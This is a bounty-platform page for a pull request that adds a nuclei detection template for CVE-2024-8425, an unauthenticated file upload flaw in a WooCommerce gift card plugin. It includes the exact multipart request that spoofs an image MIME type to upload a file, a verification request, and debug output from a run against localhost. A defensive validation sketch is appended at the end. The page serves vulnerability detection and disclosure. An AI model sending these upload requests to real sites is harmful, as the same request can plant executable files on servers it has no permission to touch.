PR
Add template for CVE-2024-8425
projectdiscovery/nuclei-templates#13100

Template / PR Information

Added CVE-2024-8425 - WooCommerce Ultimate Gift Card ≤ 2.6.0 Arbitrary File Upload vulnerability detection template

This template detects an unauthenticated arbitrary file upload vulnerability in the WooCommerce Ultimate Gift Card WordPress plugin. The vulnerability exists due to insufficient file type validation that relies on client-controlled MIME types in the mwb_wgm_preview_mail function.

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details

Vulnerability Details:

  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network, No authentication required
  • Impact: Remote Code Execution via arbitrary file upload

Detection Method:

  1. Uploads a benign text file with spoofed Content-Type: image/jpeg header to bypass MIME validation
  2. Verifies successful upload by fetching the file from /wp-content/uploads/mwb_browse/
  3. Non-intrusive - only uploads a harmless text file for verification

HTTP Request/Response Snippet:

POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456

------WebKitFormBoundary123456
Content-Disposition: form-data; name="file"; filename="test-12345.txt"
Content-Type: image/jpeg

CVE-2024-8425-VERIFICATION-1234
------WebKitFormBoundary123456--

Response (successful exploitation):

http://target/?mwb_wgm_preview_email=mwb_wgm_single_page_popup&name=test-12345.txt&...

Verification GET request confirms file upload:

GET /wp-content/uploads/mwb_browse/test-12345.txt

HTTP/1.1 200 OK
Content-Type: text/plain

CVE-2024-8425-VERIFICATION-1234

Testing Environment:

  • Requires mwb_wgm_other_setting_browse option enabled in WordPress
  • Docker environment available for reproducible testing

Debug output:

docker run --rm --volume `pwd`:/dev/shm --network host --name nuclei nuclei -t /dev/shm/http/cves/2024/CVE-2024-8425.yaml -u http://localhost:8080 --debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] [CVE-2024-8425] Dumped HTTP request for http://localhost:8080/wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail
POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 482
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary989549
Accept-Encoding: gzip
------WebKitFormBoundary989549
Content-Disposition: form-data; name="mwb_wgm_preview_email"
test
------WebKitFormBoundary989549
Content-Disposition: form-data; name="tempId"
1
------WebKitFormBoundary989549
Content-Disposition: form-data; name="message"
security test
------WebKitFormBoundary989549
Content-Disposition: form-data; name="file"; filename="test-84849.txt"
Content-Type: image/jpeg
CVE-2024-8425-VERIFICATION-5999
------WebKitFormBoundary989549--
[DBG] [CVE-2024-8425] Dumped HTTP response http://localhost:8080/wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Fri, 05 Sep 2025 07:44:26 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.65 (Debian)
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.29
X-Robots-Tag: noindex
http://localhost:8080/?mwb_wgm_preview_email=mwb_wgm_single_page_popup&tempId=1&message=security+test&name=test-84849.txt&width=630&height=530&TB_iframe=1
[INF] [CVE-2024-8425] Dumped HTTP request for http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt
GET /wp-content/uploads/mwb_browse/test-84849.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2024-8425] Dumped HTTP response http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt
HTTP/1.1 200 OK
Connection: close
Content-Length: 31
Accept-Ranges: bytes
Content-Type: text/plain
Date: Fri, 05 Sep 2025 07:44:26 GMT
Etag: W/"1f-63e0901d5d8e8"
Last-Modified: Fri, 05 Sep 2025 07:44:26 GMT
Server: Apache/2.4.65 (Debian)
CVE-2024-8425-VERIFICATION-5999
[CVE-2024-8425:status-1] [http] [critical] http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt ["CVE-2024-8425-VERIFICATION-5999"]
[CVE-2024-8425:word-2] [http] [critical] http://localhost:8080/wp-content/uploads/mwb_browse/test-84849.txt ["CVE-2024-8425-VERIFICATION-5999"]
[INF] Scan completed in 706.429114ms. 2 matches found.

/claim #12994
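
The root cause named in this PR is validation that trusts the client-supplied part Content-Type. As an added example (not part of the PR, the template, or the plugin's code), the following Python sketch shows the server-side check that closes that gap by comparing the declared type with the file's leading bytes and extension. The allowlist, the function names `sniff` and `audit_upload`, and the sample constants are assumptions made for illustration.

```python
import os
from email.parser import BytesParser
from email.policy import HTTP

# Assumed allowlist (signatures, extensions); the plugin's accepted types are not on the page.
IMAGE_TYPES = {
    "image/jpeg": ((b"\xff\xd8\xff",), {".jpg", ".jpeg"}),
    "image/png": ((b"\x89PNG\r\n\x1a\n",), {".png"}),
    "image/gif": ((b"GIF87a", b"GIF89a"), {".gif"}),
}

def sniff(data):
    """Return the image type implied by the bytes themselves, or None."""
    for mime, (signatures, _) in IMAGE_TYPES.items():
        if data.startswith(signatures):
            return mime
    return None

def audit_upload(content_type_header, body):
    """Return [(filename, declared_type, reasons)] for file parts that fail validation."""
    raw = b"Content-Type: " + content_type_header.encode("ascii") + b"\r\n\r\n" + body
    message = BytesParser(policy=HTTP).parsebytes(raw)
    findings = []
    for part in message.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue  # plain form field such as tempId, not a file part
        declared = part.get_content_type()  # client-controlled, never trusted alone
        actual = sniff(part.get_payload(decode=True) or b"")
        ext = os.path.splitext(filename)[1].lower()
        reasons = []
        if actual is None:
            reasons.append("content has no known image signature")
        elif actual != declared:
            reasons.append("content is %s, not the declared type" % actual)
        if ext not in IMAGE_TYPES.get(actual or declared, ((), set()))[1]:
            reasons.append("extension %r does not match an allowed image type" % ext)
        if reasons:
            findings.append((filename, declared, reasons))
    return findings

# Constructed sample: the file part from the debug output above, with CRLF framing restored.
SAMPLE_TYPE = "multipart/form-data; boundary=----WebKitFormBoundary989549"
SAMPLE_BODY = (
    b'------WebKitFormBoundary989549\r\nContent-Disposition: form-data; name="tempId"\r\n\r\n1\r\n'
    b'------WebKitFormBoundary989549\r\nContent-Disposition: form-data; name="file"; '
    b'filename="test-84849.txt"\r\nContent-Type: image/jpeg\r\n\r\n'
    b"CVE-2024-8425-VERIFICATION-5999\r\n------WebKitFormBoundary989549--\r\n"
)
print(audit_upload(SAMPLE_TYPE, SAMPLE_BODY))
```

The same comparison can run in an upload handler before the file is written, or in a request-inspection layer in front of `admin-ajax.php`.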

Claim

Total prize pool $100
Total paid $100
Status Approved
Submitted September 05, 2025
Last updated September 05, 2025

Contributors

Jason Villaluna

@jsnv-dev

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$100 paid